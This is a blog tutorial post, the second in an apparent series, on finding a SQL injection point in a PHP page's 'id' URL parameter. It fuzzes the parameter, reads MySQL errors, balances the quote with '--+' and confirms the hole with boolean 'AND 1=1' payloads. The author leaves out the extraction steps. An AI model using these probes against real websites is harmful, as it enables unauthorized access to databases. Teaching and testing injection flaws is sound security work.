Monday, June 4, 2012

SQL Injecting Parameters-2

From the last post, we know how to find the parameter, and also how to balance it, and get the Injection field.

Last post the developer had poorly coded the PHP script, and thus appending a single quote(') gave the error. So he was thrown out of the company, because hackers easily gained info from the database.

Now comes a second developer, where he re-coded the PHP script. Once again challenging the Hackers community.

So we have URL, once again our prime objective is to understand how is 2nd Layer code, from the errors we get.

Lets start:

http://www.example.com/index.php?category=watch&id=1

So from the URL, what can I conclude?
There must be a Column(category) and rows(watch), and with id=1, it gives some info about the id=1 watch.

With that in Mind, we know that 'id' maybe once again a vulnerable parameter, lets try to Fuzz it.


http://www.example.com/index.php?category=watch&id=foo >> Unknown column 'foo' in 'where clause'

[+] Okay, it means when we insert some string, It tries to match the String with the columns. Thus giving me an Idea, that once again no proper filtration is done.

http://www.example.com/index.php?category=watch&id=999999999 >> Blank Page

http://www.example.com/index.php?category=watch&id=CK123 >> Unknown column 'CK123' in 'where clause'

http://www.example.com/index.php?category=watch&id=123CK >> Unknown column '123CK' in 'where clause'

[+] It means when we insert some alpha-Numeric, It tries to match the String with the columns. No proper filtration is done.

http://www.example.com/index.php?category=watch&id=1' >> MySQL Error(JackPot)

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1"

[+] Insertion of a special character, breaks the Developers Code

Lets Focus on the Error we got:

#> Error 1: '' LIMIT 0,1'

Ok, seems little confusing the error, lets try with another special character:

http://www.example.com/index.php?category=watch&id=1\

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ LIMIT 0,1' at line 1"

#> Error 2: '\ LIMIT 0,1'

Now what we see here, the developer has already assigned the outermost quotes, and those are single quotes. lets get rid of those.

The hacker, opens up the Notepad:

'' LIMIT 0,1'
' LIMIT 0,1

http://www.example.com/index.php?category=watch&id='  User Input here   '
http://www.example.com/index.php?category=watch&id='        1           '
http://www.example.com/index.php?category=watch&id='        1'          '

lets try to balance it, so that we get out injection field.

Notice here something, when we insert the single quote, since the quotes got unbalanced, it gave the error, but the id number is missing.

Now To balance it we need the comment symbols.

What If we do something like this:

http://www.example.com/index.php?category=watch&id='        1 --+'          '

#> Our Injection is: --+'

Voila, it got balanced, and we got the injection Field.

Now any valid SQL Query between 1 (Injection Here) --+' will be executed.

Now to check If its correct,

http://www.example.com/index.php?category=watch&id=1 AND 1=2 --+' >> Blank, as the logic is False
http://www.example.com/index.php?category=watch&id=1 AND 1=1 --+' >> Valid Display, as the logic is True

Again In this post I am not showing the next steps. because, identifying the injection is the crucial part of SQL Injection.

Hope You are Enjoying It.

Thank You!

0 comments:

Post a Comment